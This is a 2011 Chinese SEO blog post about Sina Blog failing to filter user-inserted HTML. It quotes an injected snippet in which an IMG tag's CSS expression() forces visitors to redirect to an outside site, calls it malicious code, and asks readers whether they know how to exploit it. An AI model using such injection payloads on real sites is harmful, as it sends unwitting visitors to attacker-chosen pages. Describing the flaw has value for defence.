新浪博客字符过滤不严导致执行任意代码

December 28, 2011 | tags 新浪博客字符过滤执行代码网络快讯 | views

Comments 0

案例：
示例博客：http://blog.sina.com.cn/u/2439749250
是新浪的博客,其中插入一段代码,新浪并没有过滤,导致可以直接跳转

跳转到：

网页源码：


<script type="text/javascript">
var _rsCI="cn-sina2006";
var _rsCG="0";
var _rsDN="//secure-cn.imrworldwide.com/";
var _rsCC=0;
var _rsSE=1;
var _rsSM=0.01;
var _rsSS=1500;
</script>
<script type="text/javascript" src="//secure-cn.imrworldwide.com/v52.js"></script>
<noscript><img src="//secure-cn.imrworldwide.com/cgi-bin/m?ci=cn-sina2006&cg=0" alt=""/> </noscript>

</html>

其中导致直接跳转的部分为：
</div>
            <div class="SG_connBody">
             <div class="diywidget"><DIV CLASS="SG_connBody"><DIV CLASS="diywidget"><IMG STYLE="x:expression(if(window.r!=1){window.r=1; window.location.href=" http://www.zzpbz.com"})" /></DIV></DIV></div>            </div>
            <div class="SG_connFoot"></div>
</div>

上述代码即为恶意代码！同志们，知道怎么利用了么？上述的例子……

原创文章如转载，请注明：转载自常州SEO-网站推广优化-iitding
原文地址：http://www.dingseo.com.cn/post/243.html

你“中奖”了么？关于对已备案网站信息抽样核查的通知   (2011-9-6 12:20:41)
一年一次的工信部“改革”，你准备好了么？  (2011-1-18 16:43:20)
“史上最贵网站”-3520万，你能想象到吗？  (2010-3-10 10:14:8)
世界排名TOP 25的SEO BLOG  (2010-1-22 16:42:5)
《网络商品交易管理暂行办法》将出台个人开网店3月全部实名制  (2010-1-22 15:24:41)
《中华人民共和国宪法》第35条规定  (2010-1-22 15:8:24)
关于落实CN域名注册信息审核的紧急通知  (2010-1-22 14:12:50)
看完《蜗居》后的对话，接下来我们该怎么做？  (2009-11-27 16:17:14)
百度“凤巢”即将上线，或许是一个新的搜索时代！  (2009-11-27 15:53:13)

发表评论:

◎欢迎参与讨论，请在这里发表您的看法、交流您的观点。

常州SEO博客

Previous

Random articles

Categories

Archives

Misc